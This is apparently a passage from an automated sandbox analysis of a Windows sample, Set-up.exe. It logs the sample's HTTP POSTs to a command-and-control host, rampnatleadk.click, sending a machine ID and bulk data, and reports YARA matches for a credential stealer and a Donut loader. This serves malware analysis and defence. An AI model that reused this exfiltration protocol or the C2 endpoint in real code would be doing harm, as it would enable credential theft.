Data Ascii: --3XEH7KGCEF7JXContent-Disposition: form-data; name="hwid"801F0EBAB93B947BB960CC18D99B375A--3XEH7KGCEF7JXContent-Disposition: form-data; name="pid"2--3XEH7KGCEF7JXContent-Disposition: form-data; name="lid"fBkCmu--next2k$--3XEH7KGCE
2025-01-12 14:20:15 UTC | 2804 | OUT | (binary payload, non-printable; raw hex and ASCII rendering omitted)
2025-01-12 14:20:16 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 14:20:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=bd6o4qdoe8o96tcqr76gprm16f; expires=Thu, 08 May 2025 08:06:55 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GpmVnCZUcAQWVR%2BZqKFeqOHFFpOTvxLJuIIbTXYjBtKSRSM3UozFhAIMlTbQPIFziok7gP7hNp94c5Z5EMwwIM1VEk%2BGdssXsWT7Ex6To7XNioU0lwf0B8IxWorWFcPAa5cHQ%2B0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 900dc9477ca6c468-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1620&rtt_var=631&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19094&delivery_rate=1702623&cwnd=235&unsent_bytes=0&cid=d7fb594a0292ce83&ts=683&x=0"
2025-01-12 14:20:16 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-12 14:20:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.449735172.67.139.1444437104C:\Users\user\Desktop\Set-up.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-12 14:20:17 UTC274OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=FISV8E7XM
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8732
                                                                                    Host: rampnatleadk.click
                                                                                    2025-01-12 14:20:17 UTC8732OUTData Raw: 2d 2d 46 49 53 56 38 45 37 58 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 31 46 30 45 42 41 42 39 33 42 39 34 37 42 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 46 49 53 56 38 45 37 58 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 49 53 56 38 45 37 58 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 42 6b 43 6d 75 2d 2d 6e 65 78 74 32 6b 24 0d 0a 2d 2d 46 49 53 56 38 45 37 58 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                    Data Ascii: --FISV8E7XMContent-Disposition: form-data; name="hwid"801F0EBAB93B947BB960CC18D99B375A--FISV8E7XMContent-Disposition: form-data; name="pid"2--FISV8E7XMContent-Disposition: form-data; name="lid"fBkCmu--next2k$--FISV8E7XMContent-Di
                                                                                    2025-01-12 14:20:17 UTC1135INHTTP/1.1 200 OK
                                                                                    Date: Sun, 12 Jan 2025 14:20:17 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=jstpenktcua7uojt4vro3dl0bd; expires=Thu, 08 May 2025 08:06:56 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B7MiozCcEGB0vIegGMGHOfprmEU7anUDAJggQXgRgSN0AJneAvAye3NVf0FnI%2BqueuM4RrsktXc35JQj14%2FhbnEzXjZ%2F7Ix3OZr2EtdiPEr3%2F%2F2w6P9N2333Tn6lPyB5W6VXqBo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 900dc94f4be543b7-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1701&rtt_var=671&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9664&delivery_rate=1592148&cwnd=238&unsent_bytes=0&cid=03fee465817317ab&ts=485&x=0"
                                                                                    2025-01-12 14:20:17 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                    Data Ascii: fok 8.46.123.189
                                                                                    2025-01-12 14:20:17 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                    4           192.168.2.4  49736        172.67.139.144  443               7104  C:\Users\user\Desktop\Set-up.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    2025-01-12 14:20:18 UTC  279  OUT  POST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=LN94D6SCN5NTA
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 20409
                                                                                    Host: rampnatleadk.click
                                                                                    2025-01-12 14:20:18 UTC15331OUTData Raw: 2d 2d 4c 4e 39 34 44 36 53 43 4e 35 4e 54 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 31 46 30 45 42 41 42 39 33 42 39 34 37 42 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 4c 4e 39 34 44 36 53 43 4e 35 4e 54 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 4e 39 34 44 36 53 43 4e 35 4e 54 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 42 6b 43 6d 75 2d 2d 6e 65 78 74 32 6b 24 0d 0a 2d 2d 4c 4e 39 34 44 36 53 43 4e
                                                                                    Data Ascii: --LN94D6SCN5NTAContent-Disposition: form-data; name="hwid"801F0EBAB93B947BB960CC18D99B375A--LN94D6SCN5NTAContent-Disposition: form-data; name="pid"3--LN94D6SCN5NTAContent-Disposition: form-data; name="lid"fBkCmu--next2k$--LN94D6SCN
                                                                                    2025-01-12 14:20:18 UTC5078OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                    2025-01-12 14:20:20 UTC  1136  IN  HTTP/1.1 200 OK
                                                                                    Date: Sun, 12 Jan 2025 14:20:20 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=3fs0fg9krvohmufkc4kk04v0n7; expires=Thu, 08 May 2025 08:06:57 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=svE7GNQGtn6uWZv5%2FR%2BD3zide3jFo9UAbwryHRz4JlVGph6oRk6gGrPS2tCG%2BUFlOR86r8%2BHZXuQQd72eIgO0u9vPpuu7LB09azI3oAqh4RslGhrraljkgeCJ%2Fdt5OPpkuasd7c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 900dc9570ad67ce2-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1968&rtt_var=757&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21368&delivery_rate=1428571&cwnd=238&unsent_bytes=0&cid=20f0d734e8021bbc&ts=2170&x=0"
                                                                                    2025-01-12 14:20:20 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                    Data Ascii: fok 8.46.123.189
                                                                                    2025-01-12 14:20:20 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                    5           192.168.2.4  49737        172.67.139.144  443               7104  C:\Users\user\Desktop\Set-up.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    2025-01-12 14:20:21 UTC  284  OUT  POST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=57E1C7PTPJW6B8194RN
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 1409
                                                                                    Host: rampnatleadk.click
                                                                                    2025-01-12 14:20:21 UTC1409OUTData Raw: 2d 2d 35 37 45 31 43 37 50 54 50 4a 57 36 42 38 31 39 34 52 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 31 46 30 45 42 41 42 39 33 42 39 34 37 42 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 35 37 45 31 43 37 50 54 50 4a 57 36 42 38 31 39 34 52 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 37 45 31 43 37 50 54 50 4a 57 36 42 38 31 39 34 52 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 42 6b 43 6d 75 2d 2d 6e 65
                                                                                    Data Ascii: --57E1C7PTPJW6B8194RNContent-Disposition: form-data; name="hwid"801F0EBAB93B947BB960CC18D99B375A--57E1C7PTPJW6B8194RNContent-Disposition: form-data; name="pid"1--57E1C7PTPJW6B8194RNContent-Disposition: form-data; name="lid"fBkCmu--ne
                                                                                    2025-01-12 14:20:22 UTC  1124  IN  HTTP/1.1 200 OK
                                                                                    Date: Sun, 12 Jan 2025 14:20:22 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=hcuh8b1hm45sr9opn6sfe1eam8; expires=Thu, 08 May 2025 08:07:01 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5haaQ17NMGde%2Frs22CCOazIYGUVRBSNecQW9ibFrl1wkckFkuS6wVehQtxOnnO6dUpnGkCVt3fHRvyz7UCKlEwOGZkhpBoqEI0Ztt7XsPgpDWVTBDUacLzQlb0DZKtBWeiUUDw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 900dc96c5cd50f64-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1656&rtt_var=632&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2329&delivery_rate=1717647&cwnd=233&unsent_bytes=0&cid=d3de20084a7c2c0a&ts=489&x=0"
                                                                                    2025-01-12 14:20:22 UTC  20  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                    Data Ascii: fok 8.46.123.189
                                                                                    2025-01-12 14:20:22 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                    6           192.168.2.4  49741        172.67.139.144  443               7104  C:\Users\user\Desktop\Set-up.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    2025-01-12 14:20:23 UTC  278  OUT  POST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=KVHPB4STMIJ
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 549671
                                                                                    Host: rampnatleadk.click
                                                                                    2025-01-12 14:20:23 UTC15331OUTData Raw: 2d 2d 4b 56 48 50 42 34 53 54 4d 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 31 46 30 45 42 41 42 39 33 42 39 34 37 42 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 4b 56 48 50 42 34 53 54 4d 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 56 48 50 42 34 53 54 4d 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 66 42 6b 43 6d 75 2d 2d 6e 65 78 74 32 6b 24 0d 0a 2d 2d 4b 56 48 50 42 34 53 54 4d 49 4a 0d 0a 43 6f
                                                                                    Data Ascii: --KVHPB4STMIJContent-Disposition: form-data; name="hwid"801F0EBAB93B947BB960CC18D99B375A--KVHPB4STMIJContent-Disposition: form-data; name="pid"1--KVHPB4STMIJContent-Disposition: form-data; name="lid"fBkCmu--next2k$--KVHPB4STMIJCo
                                                                                    2025-01-12 14:20:26 UTC  1133  IN  HTTP/1.1 200 OK
                                                                                    Date: Sun, 12 Jan 2025 14:20:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=kjl5o98ma5n64gp3g8je05frd9; expires=Thu, 08 May 2025 08:07:04 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1a8rCCrVhViToZMOjTQBQqmXT1o6uIbtKGRMjoQgjp0lSeHcLFY9KWhCSL1HuiK537vsXbWHYYqGEXoN%2BuNXZEKz8QQhIFMWRU0MWpG6bs3%2BsQfo0TsJWB0r7QDv1LK0VYXVJ18%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 900dc976efed4322-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1828&rtt_var=689&sent=191&recv=567&lost=0&retrans=0&sent_bytes=2845&recv_bytes=552147&delivery_rate=1597374&cwnd=221&unsent_bytes=0&cid=f78e6e91874ca58f&ts=2834&x=0"


                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                    7           192.168.2.4  49745        172.67.139.144  443               7104  C:\Users\user\Desktop\Set-up.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    2025-01-12 14:20:26 UTC  266  OUT  POST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 84
                                                                                    Host: rampnatleadk.click
                                                                                    2025-01-12 14:20:26 UTC  84  OUT  Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 66 42 6b 43 6d 75 2d 2d 6e 65 78 74 32 6b 24 26 6a 3d 26 68 77 69 64 3d 38 30 31 46 30 45 42 41 42 39 33 42 39 34 37 42 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41
                                                                                    Data Ascii: act=get_message&ver=4.0&lid=fBkCmu--next2k$&j=&hwid=801F0EBAB93B947BB960CC18D99B375A
                                                                                    2025-01-12 14:20:27 UTC  1124  IN  HTTP/1.1 200 OK
                                                                                    Date: Sun, 12 Jan 2025 14:20:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=m20qv8r9thpomchtvbfu42dop4; expires=Thu, 08 May 2025 08:07:06 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    X-Frame-Options: DENY
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x1QC4xpMohwvaCgXUFszks4nMC8WmoDhfg21qJO7YNiaCqixhnMQlch3sU5BwRT70sy22%2Fb6cTB0Kzg5F8jMy3cT6JJaicFLQpRG2vurEOOXdirdTzgYz3uAdSp3hfpZwYZzX3E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 900dc98ade804390-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1700&rtt_var=646&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=986&delivery_rate=1682027&cwnd=243&unsent_bytes=0&cid=4eec4aaf36e74a79&ts=1362&x=0"
                                                                                    2025-01-12 14:20:27 UTC54INData Raw: 33 30 0d 0a 48 7a 58 39 42 57 79 43 6f 33 79 75 71 37 74 67 59 67 4f 45 4e 7a 70 50 39 7a 58 5a 73 4a 32 65 75 46 55 55 63 2f 45 6e 43 2f 6c 45 61 41 3d 3d 0d 0a
                                                                                    Data Ascii: 30HzX9BWyCo3yuq7tgYgOENzpP9zXZsJ2euFUUc/EnC/lEaA==
                                                                                    2025-01-12 14:20:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


Target ID: 0
Start time: 09:20:05
Start date: 12/01/2025
Path: C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Set-up.exe"
Imagebase: 0x400000
File size: 73'935'792 bytes
MD5 hash: 7A7570C5AFC5BF3D53854F4AE9E61457
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1841233829.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1840272460.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

No disassembly